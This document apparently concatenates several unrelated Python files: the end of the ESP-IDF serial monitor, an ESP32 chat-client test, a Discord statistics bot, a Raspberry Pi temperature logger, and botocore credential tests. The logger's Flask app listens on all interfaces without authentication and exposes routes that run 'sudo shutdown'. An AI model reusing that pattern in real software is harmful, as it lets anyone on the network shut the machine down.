yellow_print("\nToggle output display: {}, Type Ctrl-T Ctrl-Y to show/disable output again.".format(self._output_enabled))
def toggle_logging(self):
if self._log_file:
self.stop_logging()
else:
self.start_logging()
def start_logging(self):
if not self._log_file:
try:
name = "log.{}.{}.txt".format(os.path.splitext(os.path.basename(self.elf_file))[0],
datetime.datetime.now().strftime('%Y%m%d%H%M%S'))
self._log_file = open(name, "wb+")
yellow_print("\nLogging is enabled into file {}".format(name))
except Exception as e:
red_print("\nLog file {} cannot be created: {}".format(name, e))
def stop_logging(self):
if self._log_file:
try:
name = self._log_file.name
self._log_file.close()
yellow_print("\nLogging is disabled and file {} has been closed".format(name))
except Exception as e:
red_print("\nLog file cannot be closed: {}".format(e))
finally:
self._log_file = None
def _print(self, string, console_printer=None):
if console_printer is None:
console_printer = self.console.write_bytes
if self._output_enabled:
console_printer(string)
if self._log_file:
try:
if isinstance(string, type(u'')):
string = string.encode()
self._log_file.write(string)
except Exception as e:
red_print("\nCannot write to file: {}".format(e))
# don't fill-up the screen with the previous errors (probably consequent prints would fail also)
self.stop_logging()
def handle_commands(self, cmd):
if cmd == CMD_STOP:
self.console_reader.stop()
self.serial_reader.stop()
elif cmd == CMD_RESET:
self.serial.setRTS(True)
time.sleep(0.2)
self.serial.setRTS(False)
self.output_enable(True)
elif cmd == CMD_MAKE:
self.run_make("flash")
elif cmd == CMD_APP_FLASH:
self.run_make("app-flash")
elif cmd == CMD_OUTPUT_TOGGLE:
self.output_toggle()
elif cmd == CMD_TOGGLE_LOGGING:
self.toggle_logging()
elif cmd == CMD_ENTER_BOOT:
self.serial.setDTR(False) # IO0=HIGH
self.serial.setRTS(True) # EN=LOW, chip in reset
time.sleep(1.3) # timeouts taken from esptool.py, includes esp32r0 workaround. defaults: 0.1
self.serial.setDTR(True) # IO0=LOW
self.serial.setRTS(False) # EN=HIGH, chip out of reset
time.sleep(0.45) # timeouts taken from esptool.py, includes esp32r0 workaround. defaults: 0.05
self.serial.setDTR(False) # IO0=HIGH, done
else:
raise RuntimeError("Bad command data %d" % (cmd))
def main():
def _get_default_serial_port():
"""
Same logic for detecting serial port as esptool.py and idf.py: reverse sort by name and choose the first port.
"""
try:
ports = list(reversed(sorted(p.device for p in serial.tools.list_ports.comports())))
return ports[0]
except Exception:
return '/dev/ttyUSB0'
parser = argparse.ArgumentParser("idf_monitor - a serial output monitor for esp-idf")
parser.add_argument(
'--port', '-p',
help='Serial port device',
default=os.environ.get('ESPTOOL_PORT', _get_default_serial_port())
)
parser.add_argument(
'--baud', '-b',
help='Serial port baud rate',
type=int,
default=os.environ.get('MONITOR_BAUD', 115200))
parser.add_argument(
'--make', '-m',
help='Command to run make',
type=str, default='make')
parser.add_argument(
'--toolchain-prefix',
help="Triplet prefix to add before cross-toolchain names",
default=DEFAULT_TOOLCHAIN_PREFIX)
parser.add_argument(
"--eol",
choices=['CR', 'LF', 'CRLF'],
type=lambda c: c.upper(),
help="End of line to use when sending to the serial port",
default='CR')
parser.add_argument(
'elf_file', help='ELF file of application',
type=argparse.FileType('rb'))
parser.add_argument(
'--print_filter',
help="Filtering string",
default=DEFAULT_PRINT_FILTER)
args = parser.parse_args()
if args.port.startswith("/dev/tty."):
args.port = args.port.replace("/dev/tty.", "/dev/cu.")
yellow_print("--- WARNING: Serial ports accessed as /dev/tty.* will hang gdb if launched.")
yellow_print("--- Using %s instead..." % args.port)
serial_instance = serial.serial_for_url(args.port, args.baud,
do_not_open=True)
serial_instance.dtr = False
serial_instance.rts = False
args.elf_file.close() # don't need this as a file
# remove the parallel jobserver arguments from MAKEFLAGS, as any
# parent make is only running 1 job (monitor), so we can re-spawn
# all of the child makes we need (the -j argument remains part of
# MAKEFLAGS)
try:
makeflags = os.environ["MAKEFLAGS"]
makeflags = re.sub(r"--jobserver[^ =]*=[0-9,]+ ?", "", makeflags)
os.environ["MAKEFLAGS"] = makeflags
except KeyError:
pass # not running a make jobserver
monitor = Monitor(serial_instance, args.elf_file.name, args.print_filter, args.make, args.toolchain_prefix, args.eol)
yellow_print('--- idf_monitor on {p.name} {p.baudrate} ---'.format(
p=serial_instance))
yellow_print('--- Quit: {} | Menu: {} | Help: {} followed by {} ---'.format(
key_description(monitor.console_parser.exit_key),
key_description(monitor.console_parser.menu_key),
key_description(monitor.console_parser.menu_key),
key_description(CTRL_H)))
if args.print_filter != DEFAULT_PRINT_FILTER:
yellow_print('--- Print filter: {} ---'.format(args.print_filter))
monitor.main_loop()
if os.name == 'nt':
# Windows console stuff
STD_OUTPUT_HANDLE = -11
STD_ERROR_HANDLE = -12
# wincon.h values
FOREGROUND_INTENSITY = 8
FOREGROUND_GREY = 7
# matches the ANSI color change sequences that IDF sends
RE_ANSI_COLOR = re.compile(b'\033\\[([01]);3([0-7])m')
# list mapping the 8 ANSI colors (the indexes) to Windows Console colors
ANSI_TO_WINDOWS_COLOR = [0, 4, 2, 6, 1, 5, 3, 7]
GetStdHandle = ctypes.windll.kernel32.GetStdHandle
SetConsoleTextAttribute = ctypes.windll.kernel32.SetConsoleTextAttribute
class ANSIColorConverter(object):
"""Class to wrap a file-like output stream, intercept ANSI color codes,
and convert them into calls to Windows SetConsoleTextAttribute.
Doesn't support all ANSI terminal code escape sequences, only the sequences IDF uses.
Ironically, in Windows this console output is normally wrapped by winpty which will then detect the console text
color changes and convert these back to ANSI color codes for MSYS' terminal to display. However this is the
least-bad working solution, as winpty doesn't support any "passthrough" mode for raw output.
"""
def __init__(self, output=None, decode_output=False):
self.output = output
self.decode_output = decode_output
self.handle = GetStdHandle(STD_ERROR_HANDLE if self.output == sys.stderr else STD_OUTPUT_HANDLE)
self.matched = b''
def _output_write(self, data):
try:
if self.decode_output:
self.output.write(data.decode())
else:
self.output.write(data)
except IOError:
# Windows 10 bug since the Fall Creators Update, sometimes writing to console randomly throws
# an exception (however, the character is still written to the screen)
# Ref https://github.com/espressif/esp-idf/issues/1136
pass
def write(self, data):
if isinstance(data, bytes):
data = bytearray(data)
else:
data = bytearray(data, 'utf-8')
for b in data:
b = bytes([b])
length = len(self.matched)
if b == b'\033': # ESC
self.matched = b
elif (length == 1 and b == b'[') or (1 < length < 7):
self.matched += b
if self.matched == ANSI_NORMAL.encode('latin-1'): # reset console
# Flush is required only with Python3 - switching color before it is printed would mess up the console
self.flush()
SetConsoleTextAttribute(self.handle, FOREGROUND_GREY)
self.matched = b''
elif len(self.matched) == 7: # could be an ANSI sequence
m = re.match(RE_ANSI_COLOR, self.matched)
if m is not None:
color = ANSI_TO_WINDOWS_COLOR[int(m.group(2))]
if m.group(1) == b'1':
color |= FOREGROUND_INTENSITY
# Flush is required only with Python3 - switching color before it is printed would mess up the console
self.flush()
SetConsoleTextAttribute(self.handle, color)
else:
self._output_write(self.matched) # not an ANSI color code, display verbatim
self.matched = b''
else:
self._output_write(b)
self.matched = b''
def flush(self):
self.output.flush()
if __name__ == "__main__":
main()
|
asio_chat_client_test.py
|
import os
import re
import socket
import time
from threading import Thread
import ttfw_idf
global g_client_response
global g_msg_to_client
g_client_response = b''
g_msg_to_client = b'   3XYZ'
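# chat_message framing (editorial note): a 4-byte, space-padded decimal length
# header precedes the payload, so b'   3XYZ' is header b'   3' (length 3)
# followed by body b'XYZ'; the [4:] slices below strip that header.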
def get_my_ip():
s1 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s1.connect(('8.8.8.8', 80))
my_ip = s1.getsockname()[0]
s1.close()
return my_ip
def chat_server_sketch(my_ip):
global g_client_response
print('Starting the server on {}'.format(my_ip))
port = 2222
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(600)
s.bind((my_ip, port))
s.listen(1)
q,addr = s.accept()
print('connection accepted')
q.settimeout(30)
q.send(g_msg_to_client)
data = q.recv(1024)
# check if received initial empty message
if (len(data) > 4):
g_client_response = data
else:
g_client_response = q.recv(1024)
print('received from client {}'.format(g_client_response))
s.close()
print('server closed')
@ttfw_idf.idf_example_test(env_tag='Example_WIFI')
def test_examples_protocol_asio_chat_client(env, extra_data):
"""
steps: |
1. Test to start simple tcp server
2. `dut1` joins AP
3. Test injects server IP to `dut1`via stdin
4. Test evaluates `dut1` receives a message server placed
5. Test injects a message to `dut1` to be sent as chat_client message
6. Test evaluates received test message in host server
"""
global g_client_response
global g_msg_to_client
test_msg = 'ABC'
dut1 = env.get_dut('chat_client', 'examples/protocols/asio/chat_client', dut_class=ttfw_idf.ESP32DUT)
# check and log bin size
binary_file = os.path.join(dut1.app.binary_path, 'asio_chat_client.bin')
bin_size = os.path.getsize(binary_file)
ttfw_idf.log_performance('asio_chat_client_size', '{}KB'.format(bin_size // 1024))
# 1. start a tcp server on the host
host_ip = get_my_ip()
thread1 = Thread(target=chat_server_sketch, args=(host_ip,))
thread1.start()
# 2. start the dut test and wait till client gets IP address
dut1.start_app()
dut1.expect(re.compile(r' IPv4 address: ([0-9]+\.[0-9]+\.[0-9]+\.[0-9]+)'), timeout=30)
# 3. send host's IP to the client i.e. the `dut1`
dut1.write(host_ip)
# 4. client `dut1` should receive a message
dut1.expect(g_msg_to_client[4:].decode()) # Strip out the front 4 bytes of message len (see chat_message protocol)
# 5. write test message from `dut1` chat_client to the server
dut1.write(test_msg)
while len(g_client_response) == 0:
time.sleep(1)
g_client_response = g_client_response.decode()
print(g_client_response)
# 6. evaluate host_server received this message
if (g_client_response[4:7] == test_msg):
print('PASS: Received correct message')
pass
else:
print('Failure!')
        raise ValueError('Wrong data received from asio tcp server: {} (expected: {})'.format(g_client_response[4:7], test_msg))
thread1.join()
if __name__ == '__main__':
test_examples_protocol_asio_chat_client()
|
statistics.py
|
import threading
import discord
import asyncio
from time import gmtime, strftime, sleep
from utils import gspread_api
client = None
msgid = ""
channelid = "307085753744228356"
msgcount = 0
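# NOTE (editorial): this module targets the pre-1.0 discord.py API
# (client.servers, client.is_closed as a property, send_message/edit_message,
# get_message); discord.py 1.x renamed these to guilds, is_closed(),
# Messageable.send(), Message.edit() and fetch_message().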
async def setServerStats():
await client.wait_until_ready()
await asyncio.sleep(3)
while not client.is_closed:
global msgid
dataset = gspread_api.get_stats()
out = {
"All Users Peak": dataset[0],
"Max Online Peak": dataset[1],
"Average Online Members": dataset[3],
"Average Online Suporters": dataset[5],
"Average on. Membs / Supp": dataset[6],
"Max on. Membs / Supp:": dataset[8],
"Collected Datasets": dataset[4]
}
em = discord.Embed(color=discord.Color.gold(), title="SERVER STATISTICS")
em.description = "See full stats **[here](https://s.zekro.de/dcstats)**\n\n*Last update: %s*\n*This will be updated every 10 minutes.*" % strftime("%Y-%m-%d %H:%M:%S", gmtime())
for k, v in out.items():
em.add_field(name=k, value=v, inline=False)
chan = list([c for c in list(client.servers)[0].channels if c.id == channelid])[0]
if msgid == "":
msg = await client.send_message(chan, embed=em)
msgid = msg.id
else:
await client.edit_message(await client.get_message(chan, msgid), embed=em)
await asyncio.sleep(10 * 60)
def action():
while not client.is_closed:
date = strftime("%d.%m.%Y %H:%M", gmtime())
server = list(client.servers)[0]
users = server.members
supprole = discord.utils.get(server.roles, name="Supporter")
members = [u for u in users if not u.bot]
online = [m for m in members if not str(m.status) == "offline"]
suppsonline = [m for m in online if supprole in m.roles]
global msgcount
gspread_api.append([date, len(members), len(online), len(suppsonline), msgcount])
msgcount = 0
sleep(30 * 60)
def run():
t = threading.Thread(target=action)
t.start()
|
temperature-monitor.py
|
"""Multi-channel temperature logger
Reads the configuration from an associated xml file.
Presents a set of webpages to display the temperature from an arbitrary number of temperature sensors as defined by the configuration.
"""
from flask import Flask, abort, render_template, request
from flask_restful import Api, Resource, reqparse, fields, marshal
import datetime
import xml.etree.ElementTree as ET
import os
import threading
import time
import csv
import RPi.GPIO as GPIO
from max31855 import MAX31855, MAX31855Error
sensor_fields = {
'name': fields.String,
'uri': fields.Url('temperature_sensor')
}
class SystemConfig(Resource):
def __init__(self):
super(SystemConfig, self).__init__()
def get(self):
return {"name": title, "units": units}
class TemperatureSensorList(Resource):
def __init__(self):
super(TemperatureSensorList, self).__init__()
def get(self):
return [marshal(temperatureSensor, sensor_fields) for temperatureSensor in sensors]
class TemperatureSensor(Resource):
def __init__(self):
super(TemperatureSensor, self).__init__()
def get(self, id):
sensor = [sensor for sensor in sensors if sensor['id'] == id]
if len(sensor) == 0:
abort(404)
return {'temperature': sensor[0]['temperature'], 'age': sensor[0]['age']}
# Sensor measurements
class MeasurementThread ( threading.Thread ):
def run ( self ):
global sensors
global temps
global air_temp
global cs_pins
global clock_pin
global data_pin
global units
thermocouples = []
for cs_pin in cs_pins:
thermocouples.append(MAX31855(cs_pin, clock_pin, data_pin, units, GPIO.BOARD))
while True: # TODO: Ideally want to detect when closing to exit the loop
channel = 1
now = datetime.datetime.now()
#print(now)
timeString = now.strftime("%H:%M on %d-%m-%Y")
for thermocouple in thermocouples:
if (channel == 1):
air_temp = int(thermocouple.get_rj())
sensors[0]['temperature'] = air_temp
try:
tc = str(int(thermocouple.get()))
temps[channel]['time'] = now
temps[channel]['age'] = ''
temps[channel]['temperature'] = tc+u'\N{DEGREE SIGN}'+units.upper()
temps[channel]['last'] = tc # Record the last valid measurement
sensors[channel]['temperature'] = tc
sensors[channel]['age'] = ''
except MAX31855Error as e:
tc = "Error: "+ e.value
if (temps[channel]['time'] == 'Never'):
age_string = "(Never measured)"
temps[channel]['temperature'] = tc
else:
temps[channel]['temperature'] = temps[channel]['last']
age = now - temps[channel]['time']
if (age.days == 0):
if (age.seconds < 60):
age_string = "(" + str(age.seconds) + "s)"
else:
if ((int(age.seconds/60)) == 1):
age_string = "(" + str(int(age.seconds/60)) + " min)"
else:
if (age.seconds > (60 * 60)): # > 1 hour
if ((int(age.seconds/60/60)) == 1):
age_string = "(" + str(int(age.seconds/60/60)) + " hour)"
else:
age_string = "(" + str(int(age.seconds/60/60)) + " hours)"
else:
age_string = "(" + str(int(age.seconds/60)) + " mins)"
if (age.seconds > (5 * 60)): # 5 mins
temps[channel]['temperature'] = tc + ". Last: " + str(temps[channel]['last'])
else:
if (age.days == 1):
age_string = "(" + str(age.days) + " day)"
else:
age_string = "(" + str(age.days) + " days)"
temps[channel]['temperature'] = tc
temps[channel]['age'] = age_string
sensors[channel]['temperature'] = temps[channel]['temperature']
sensors[channel]['age'] = age_string
channel = channel + 1
#end = datetime.datetime.now()
#print(end-now)
time.sleep(measurement_interval)
for thermocouple in thermocouples:
thermocouple.cleanup()
# Initialisation
# Read config from xml file
# Find directory of the program
app_dir = os.path.dirname(os.path.abspath(__file__))  # renamed from 'dir' to avoid shadowing the built-in
# Get the configuration
tree = ET.parse(app_dir + '/config.xml')
root_cfg = tree.getroot()
HW_cfg = root_cfg.find('HARDWARE')
sensors_cfg = root_cfg.find('SENSORS')
display_cfg = root_cfg.find('DISPLAY')
logging_cfg = root_cfg.find('LOGGING')
# Read hardware configuration
# Clock
CLK = HW_cfg.find('CLOCK')
clock_pin = int(CLK.find('PIN').text)
# Data
DATA = HW_cfg.find('DATA')
data_pin = int(DATA.find('PIN').text)
# Measurement interval
measurement_interval = int(HW_cfg.find('INTERVAL').text) # Interval in seconds between measurements
# Chip Selects
cs_pins = []
for child in sensors_cfg:
cs_pins.append(int(child.find('CSPIN').text))
# Read display settings configuration
units = display_cfg.find('UNITS').text.lower()
title = display_cfg.find('TITLE').text
sensors = [
{
'id': 0,
'name': u'Air',
'temperature': u'-',
'time' : 'Never',
'age' : ''
}]
air_temp = '-'
temps = {}
channel = 1
for child in sensors_cfg:
# sensors used to store measurements for REST API
sensors.append({'id': channel, 'name': child.find('NAME').text, 'temperature': u'-', 'age' : ''})
# temps used to store measurements for Flask HTML API
temps[channel] = {'name' : child.find('NAME').text, 'temperature' : '', 'time' : 'Never', 'age' : ''}
channel = channel + 1
# Read logging
logging_cfg = root_cfg.find('LOGGING')
log_interval = int(logging_cfg.find('INTERVAL').text)*60 # Interval in minutes from config file
log_status = "Off" # Values: Off -> On -> Stop -> Off
pending_note = ""
MeasurementThread().start()
app = Flask(__name__)
# Setup Flask REST interface
appREST = Flask(__name__, static_url_path="")
apiREST = Api(appREST)
apiREST.add_resource(SystemConfig, '/temperaturemonitor/api/v1.0/config/systemconfig', endpoint = 'SystemConfig')
apiREST.add_resource(TemperatureSensorList, '/temperaturemonitor/api/v1.0/config/sensors', endpoint = 'temperature_sensors')
apiREST.add_resource(TemperatureSensor, '/temperaturemonitor/api/v1.0/measure/sensors/<int:id>', endpoint = 'temperature_sensor')
# Flask web page code
@app.route('/')
def index():
global title
global log_status
global pending_note
now = datetime.datetime.now()
timeString = now.strftime("%H:%M on %d-%m-%Y")
if log_status == "On":
logging = "Active"
else:
logging = "Inactive"
if pending_note != "":
note = "Pending note: " + pending_note
else:
note = ""
templateData = {
'title' : title,
'time': timeString,
'logging' : logging,
'note' : note
}
return render_template('main.html', **templateData)
@app.route("/", methods=['POST']) # Seems to be run regardless of which page the post comes from
def log_button():
global log_status
global pending_note
if request.method == 'POST':
# Get the value from the submitted form
submitted_value = request.form['logging']
if submitted_value == "Log_Start":
if (log_status == "Off"):
log_status = "On"
LogThread().start()
if submitted_value =="Log_Stop":
if (log_status == "On"):
log_status = "Stop"
if submitted_value =="Add_Note":
pending_note = request.form['note']
return index()
@app.route('/note')
def note():
if pending_note != "":
note = "Pending note: " + pending_note
else:
note = ""
templateData = {
'title' : title,
'note' : note
}
return render_template('note.html', **templateData)
@app.route('/temp')
def temp():
now = datetime.datetime.now()
timeString = now.strftime("%H:%M on %d-%m-%Y")
# TODO: Consider what happens if the thread is updating the data at the same time as display
# Can a safe copy be made?
templateData = {
'title' : title,
'time': timeString,
'air' : air_temp,
'temps' : temps,
'units' : units.upper()
}
return render_template('oven.html', **templateData)
@app.route('/confirm')
def confirm():
templateData = {
'title' : title
}
return render_template('confirm.html', **templateData)
@app.route('/shutdown')
def shutdown():
command = "/usr/bin/sudo /sbin/shutdown +1"
import subprocess
process = subprocess.Popen(command.split(), stdout=subprocess.PIPE)
output = process.communicate()[0]
print (output)
templateData = {
'title' : title
}
return render_template('shutdown.html', **templateData)
@app.route('/cancel')
def cancel():
command = "/usr/bin/sudo /sbin/shutdown -c"
import subprocess
process = subprocess.Popen(command.split(), stdout=subprocess.PIPE)
output = process.communicate()[0]
print (output)
return index()
# Logging code: write a CSV file with header and then one set of sensor measurements per interval
class LogThread ( threading.Thread ):
def run ( self ):
global log_status
        global app_dir
global log_interval
global cs_pins
global clock_pin
global data_pin
global units
global pending_note
now = datetime.datetime.now()
filetime = now.strftime("%Y-%m-%d-%H-%M")
        filename = app_dir + '/logging/' + filetime + '_temperature_log.csv'
with open(filename, 'a') as csvfile:
logfile = csv.writer(csvfile, delimiter=',', quotechar='"')
row = ["Date-Time"]
for channels in temps:
row.append( temps[channels]['name'])
row.append("Age")
row.append("Notes")
logfile.writerow(row)
while log_status == "On":
with open(filename, 'a') as csvfile:
logfile = csv.writer(csvfile, delimiter=',', quotechar='"')
now = datetime.datetime.now()
row = [now.strftime("%d/%m/%Y %H:%M")]
for channel in temps:
row.append(temps[channel]['temperature'])
row.append(temps[channel]['age'])
if pending_note != "":
row.append(pending_note)
pending_note = ""
logfile.writerow(row)
time.sleep(log_interval)
log_status = "Off"
def flaskThread():
# Start webserver
app.run(debug=False, host='0.0.0.0', port=5000)
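# Run the web UI (port 5000) on a background thread and the REST API
# (port 5001) on the main thread.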
if __name__ == '__main__':
threading.Thread(target=flaskThread).start()
appREST.run(debug=False, host='0.0.0.0', port=5001)
|
test_credentials.py
|
# Copyright 2015 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
import uuid
import threading
import os
import math
import time
import tempfile
import shutil
from datetime import datetime, timedelta
import sys
from dateutil.tz import tzlocal
from botocore.exceptions import CredentialRetrievalError
from tests import mock, unittest, IntegerRefresher, BaseEnvVar, random_chars
from tests import temporary_file, StubbedSession, SessionHTTPStubber
from botocore import UNSIGNED
from botocore.credentials import EnvProvider, ContainerProvider
from botocore.credentials import InstanceMetadataProvider
from botocore.credentials import Credentials, ReadOnlyCredentials
from botocore.credentials import AssumeRoleProvider, ProfileProviderBuilder
from botocore.credentials import CanonicalNameCredentialSourcer
from botocore.credentials import DeferredRefreshableCredentials
from botocore.credentials import create_credential_resolver
from botocore.credentials import JSONFileCache
from botocore.config import Config
from botocore.session import Session
from botocore.exceptions import InvalidConfigError, InfiniteLoopConfigError
from botocore.stub import Stubber
from botocore.utils import datetime2timestamp
class TestCredentialRefreshRaces(unittest.TestCase):
def assert_consistent_credentials_seen(self, creds, func):
collected = []
self._run_threads(20, func, collected)
        for frozen_creds in collected:
            # During testing, the refresher uses its current
# refresh count as the values for the access, secret, and
# token value. This means that at any given point in time,
# the credentials should be something like:
#
# ReadOnlyCredentials('1', '1', '1')
# ReadOnlyCredentials('2', '2', '2')
# ...
# ReadOnlyCredentials('30', '30', '30')
#
# This makes it really easy to verify we see a consistent
# set of credentials from the same time period. We just
# check if all the credential values are the same. If
# we ever see something like:
#
# ReadOnlyCredentials('1', '2', '1')
#
# We fail. This is because we're using the access_key
# from the first refresh ('1'), the secret key from
# the second refresh ('2'), and the token from the
# first refresh ('1').
            self.assertTrue(
                frozen_creds[0] == frozen_creds[1] == frozen_creds[2],
                frozen_creds)
def assert_non_none_retrieved_credentials(self, func):
collected = []
self._run_threads(50, func, collected)
for cred in collected:
self.assertIsNotNone(cred)
def _run_threads(self, num_threads, func, collected):
threads = []
for _ in range(num_threads):
threads.append(threading.Thread(target=func, args=(collected,)))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
def test_has_no_race_conditions(self):
creds = IntegerRefresher(
creds_last_for=2,
advisory_refresh=1,
mandatory_refresh=0
)
def _run_in_thread(collected):
for _ in range(4000):
frozen = creds.get_frozen_credentials()
collected.append((frozen.access_key,
frozen.secret_key,
frozen.token))
start = time.time()
self.assert_consistent_credentials_seen(creds, _run_in_thread)
end = time.time()
        # creds_last_for = 2 seconds (from above).
        # So, for example, if execution took 6.1 seconds, we should see
        # at most ceil(6.1 / 2.0) + 1 = 5 refreshes.
max_calls_allowed = math.ceil((end - start) / 2.0) + 1
self.assertTrue(creds.refresh_counter <= max_calls_allowed,
"Too many cred refreshes, max: %s, actual: %s, "
"time_delta: %.4f" % (max_calls_allowed,
creds.refresh_counter,
(end - start)))
def test_no_race_for_immediate_advisory_expiration(self):
creds = IntegerRefresher(
creds_last_for=1,
advisory_refresh=1,
mandatory_refresh=0
)
def _run_in_thread(collected):
for _ in range(100):
frozen = creds.get_frozen_credentials()
collected.append((frozen.access_key,
frozen.secret_key,
frozen.token))
self.assert_consistent_credentials_seen(creds, _run_in_thread)
def test_no_race_for_initial_refresh_of_deferred_refreshable(self):
def get_credentials():
expiry_time = (
datetime.now(tzlocal()) + timedelta(hours=24)).isoformat()
return {
'access_key': 'my-access-key',
'secret_key': 'my-secret-key',
'token': 'my-token',
'expiry_time': expiry_time
}
deferred_creds = DeferredRefreshableCredentials(
get_credentials, 'fixed')
def _run_in_thread(collected):
frozen = deferred_creds.get_frozen_credentials()
collected.append(frozen)
self.assert_non_none_retrieved_credentials(_run_in_thread)
class BaseAssumeRoleTest(BaseEnvVar):
def setUp(self):
super(BaseAssumeRoleTest, self).setUp()
self.tempdir = tempfile.mkdtemp()
self.config_file = os.path.join(self.tempdir, 'config')
self.environ['AWS_CONFIG_FILE'] = self.config_file
self.environ['AWS_SHARED_CREDENTIALS_FILE'] = str(uuid.uuid4())
def tearDown(self):
shutil.rmtree(self.tempdir)
super(BaseAssumeRoleTest, self).tearDown()
def some_future_time(self):
timeobj = datetime.now(tzlocal())
return timeobj + timedelta(hours=24)
def create_assume_role_response(self, credentials, expiration=None):
if expiration is None:
expiration = self.some_future_time()
response = {
'Credentials': {
'AccessKeyId': credentials.access_key,
'SecretAccessKey': credentials.secret_key,
'SessionToken': credentials.token,
'Expiration': expiration
},
'AssumedRoleUser': {
'AssumedRoleId': 'myroleid',
'Arn': 'arn:aws:iam::1234567890:user/myuser'
}
}
return response
def create_random_credentials(self):
return Credentials(
'fake-%s' % random_chars(15),
'fake-%s' % random_chars(35),
'fake-%s' % random_chars(45)
)
def assert_creds_equal(self, c1, c2):
c1_frozen = c1
if not isinstance(c1_frozen, ReadOnlyCredentials):
c1_frozen = c1.get_frozen_credentials()
c2_frozen = c2
if not isinstance(c2_frozen, ReadOnlyCredentials):
c2_frozen = c2.get_frozen_credentials()
self.assertEqual(c1_frozen, c2_frozen)
def write_config(self, config):
with open(self.config_file, 'w') as f:
f.write(config)
class TestAssumeRole(BaseAssumeRoleTest):
def setUp(self):
super(TestAssumeRole, self).setUp()
self.environ['AWS_ACCESS_KEY_ID'] = 'access_key'
self.environ['AWS_SECRET_ACCESS_KEY'] = 'secret_key'
self.metadata_provider = self.mock_provider(InstanceMetadataProvider)
self.env_provider = self.mock_provider(EnvProvider)
self.container_provider = self.mock_provider(ContainerProvider)
self.mock_client_creator = mock.Mock(spec=Session.create_client)
self.actual_client_region = None
current_dir = os.path.dirname(os.path.abspath(__file__))
credential_process = os.path.join(
current_dir, 'utils', 'credentialprocess.py'
)
self.credential_process = '%s %s' % (
sys.executable, credential_process
)
def mock_provider(self, provider_cls):
mock_instance = mock.Mock(spec=provider_cls)
mock_instance.load.return_value = None
mock_instance.METHOD = provider_cls.METHOD
mock_instance.CANONICAL_NAME = provider_cls.CANONICAL_NAME
return mock_instance
def create_session(self, profile=None):
session = StubbedSession(profile=profile)
# We have to set bogus credentials here or otherwise we'll trigger
# an early credential chain resolution.
sts = session.create_client(
'sts',
aws_access_key_id='spam',
aws_secret_access_key='eggs',
)
self.mock_client_creator.return_value = sts
assume_role_provider = AssumeRoleProvider(
load_config=lambda: session.full_config,
client_creator=self.mock_client_creator,
cache={},
profile_name=profile,
credential_sourcer=CanonicalNameCredentialSourcer([
self.env_provider, self.container_provider,
self.metadata_provider
]),
profile_provider_builder=ProfileProviderBuilder(
session,
sso_token_cache=JSONFileCache(self.tempdir),
),
)
stubber = session.stub('sts')
stubber.activate()
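        # Swap the matching providers in the session's credential resolver
        # for our mocks, so each test controls exactly which provider
        # supplies credentials.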
component_name = 'credential_provider'
resolver = session.get_component(component_name)
available_methods = [p.METHOD for p in resolver.providers]
replacements = {
'env': self.env_provider,
'iam-role': self.metadata_provider,
'container-role': self.container_provider,
'assume-role': assume_role_provider
}
for name, provider in replacements.items():
try:
index = available_methods.index(name)
except ValueError:
# The provider isn't in the session
continue
resolver.providers[index] = provider
session.register_component(
'credential_provider', resolver
)
return session, stubber
def test_assume_role(self):
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'source_profile = B\n\n'
'[profile B]\n'
'aws_access_key_id = abc123\n'
'aws_secret_access_key = def456\n'
)
self.write_config(config)
expected_creds = self.create_random_credentials()
response = self.create_assume_role_response(expected_creds)
session, stubber = self.create_session(profile='A')
stubber.add_response('assume_role', response)
actual_creds = session.get_credentials()
self.assert_creds_equal(actual_creds, expected_creds)
stubber.assert_no_pending_responses()
def test_environment_credential_source(self):
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'credential_source = Environment\n'
)
self.write_config(config)
environment_creds = self.create_random_credentials()
self.env_provider.load.return_value = environment_creds
expected_creds = self.create_random_credentials()
response = self.create_assume_role_response(expected_creds)
session, stubber = self.create_session(profile='A')
stubber.add_response('assume_role', response)
actual_creds = session.get_credentials()
self.assert_creds_equal(actual_creds, expected_creds)
stubber.assert_no_pending_responses()
self.assertEqual(self.env_provider.load.call_count, 1)
def test_instance_metadata_credential_source(self):
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'credential_source = Ec2InstanceMetadata\n'
)
self.write_config(config)
metadata_creds = self.create_random_credentials()
self.metadata_provider.load.return_value = metadata_creds
expected_creds = self.create_random_credentials()
response = self.create_assume_role_response(expected_creds)
session, stubber = self.create_session(profile='A')
stubber.add_response('assume_role', response)
actual_creds = session.get_credentials()
self.assert_creds_equal(actual_creds, expected_creds)
stubber.assert_no_pending_responses()
self.assertEqual(self.metadata_provider.load.call_count, 1)
def test_container_credential_source(self):
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'credential_source = EcsContainer\n'
)
self.write_config(config)
container_creds = self.create_random_credentials()
self.container_provider.load.return_value = container_creds
expected_creds = self.create_random_credentials()
response = self.create_assume_role_response(expected_creds)
session, stubber = self.create_session(profile='A')
stubber.add_response('assume_role', response)
actual_creds = session.get_credentials()
self.assert_creds_equal(actual_creds, expected_creds)
stubber.assert_no_pending_responses()
self.assertEqual(self.container_provider.load.call_count, 1)
def test_invalid_credential_source(self):
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'credential_source = CustomInvalidProvider\n'
)
self.write_config(config)
with self.assertRaises(InvalidConfigError):
session, _ = self.create_session(profile='A')
session.get_credentials()
def test_misconfigured_source_profile(self):
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'source_profile = B\n'
'[profile B]\n'
'region = us-west-2\n'
)
self.write_config(config)
with self.assertRaises(InvalidConfigError):
session, _ = self.create_session(profile='A')
session.get_credentials().get_frozen_credentials()
def test_recursive_assume_role(self):
config = (
'[profile A]\n'
'role_arn = arn:aws:iam::123456789:role/RoleA\n'
'source_profile = B\n\n'
'[profile B]\n'
